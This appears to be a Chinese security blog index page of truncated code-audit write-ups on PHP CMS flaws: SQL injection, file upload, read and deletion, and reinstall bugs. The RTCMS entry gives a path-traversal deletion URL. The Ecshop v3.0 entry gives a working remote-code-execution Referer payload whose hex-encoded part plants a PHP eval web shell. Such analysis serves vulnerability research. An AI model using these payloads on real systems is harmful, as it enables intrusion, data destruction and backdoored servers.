126cms注入

126cms 下载地址:http://down.admin5.com/php/77014.html 1.漏洞文件:126cms/job.php文件第11行到22行: if( $job == ‘updatehits’ ){ $aid = $_GET[‘aid’]; //取得 fid mid $query = “SELECT * FROM `w6_module_content_index` WHERE `id`='”.$aid.”‘”; $result = mysql_query($query); $fid = mysql_result($result,”0″,”fid”); $mid = mysql_result($result,”0″,”mid”); $query = “SELECT `aid`,`count` FROM ` ......

binzcms_v1.0前台任意文件上传与删除&&后台时间盲注

binzcms_v1.0 下载地址:http://down.admin5.com/php/69689.html 问题文件:文件binzcms/class/FrontHomeClass.php,第133-145行: private function front_member_img() { $upload_path = ‘upload/member’;   $image_insert = $this->mod_front_upload_img($upload_path); if($image_insert) {   $this->binz_common->front_msg($this->binz_tpl->var_all[‘home_member_edit_top_ok’],0,$link,$this->binz_tpl,true,2); } else {   $this->binz_common->front_msg( ......

Luocms_v2.0.10 duplicate注入

Luocms_v2.0.10 下载地址:http://down.admin5.com/php/24114.html 漏洞文件:Luocms/index.php: <?php require_once “inc/const.php”; $id = getvar(“id”); $fid = getvar(“fid”); $cid = getvar(“cid”); $act = getvar(“act”); $p = getvar(“p”); $p = !empty($p) ? $p : 1; $p_l = new cls_tpl(); $p_l->tpl_main($act,$id,$cid,$sitepath,$p); ?> 看看怎么获取参数的,查看getvar的函数定义,function文件第45-49行: function getvar($var){ $ ......

qcms1.3重装漏洞&&注入漏洞

qcms1.3 下载地址:http://down.admin5.com/php/1402.html 1.漏洞文件qcms/install/index.php文件: 1.1根本没验证安装文件,知道数据库账号密码直接可以重装 漏洞文件qcms/inc/hits.php第3-10行: <?php $nid=$_GET[‘id’]; $ns=new news; $result=$ns->news_view($nid); $qesy=$ns->news_hits($nid); $nmyrow=mysql_fetch_array($result); echo “document.writeln(‘”.$nmyrow[‘readcount’].”‘)”; ?> 跟进qcms/news类的两个函数 function news_view($id) { ......

RTCMS后台任意文件读取&&删除

RTCMS 下载地址:http://down.admin5.com/php/113335.html 1.漏洞文件:rtcms\admin\db.inc.php case ‘delete’: if(!$name)showmsg(‘请选择要删除的备份文件!’); foreach($name as $filename) { @unlink(RETENG_ROOT.’data/bakup/’.$filename); } showmsg(‘成功删除备份文件!’,’?file=db&action=import’); break; 1.1后台数据库还原删除处任意文件删除::http://localhost/admin.php?file=db&action=delete&do_submit=1&name%5B%5D=../retengcms.lock& ......

云演系统测试

http://63053cf3af6fe0aa.yunyansec.com/ Ecshop v.3.0远程代码执行 访问user.php,添加 Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:289:”*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10– -“;s:2:”id”;s: ......

beescmsV3.3 – v4.0 后台任意文件读取+修改

问题文件:admin/admin_template.php //模板修改界面 elseif($action==’xg’){ if(!check_purview(‘tpl_manage’)){msg(‘<span style=”color:red”>操作失败,你的权限不足!</span>’);} $file = $_GET[‘file’]; $path=CMS_PATH.$file; if(!$fp=@fopen($path,’r+’)){err(‘<span style=”color:red”>模板打开失败,请确定【’.$file.’】模板是否存在</span>’);} flock($fp,LOCK_EX); $str=@fread($fp,filesize($path)); $str = str_replace(“&”,”&amp;”,$str); $str= str_replace(array(“‘”,'”‘,” ......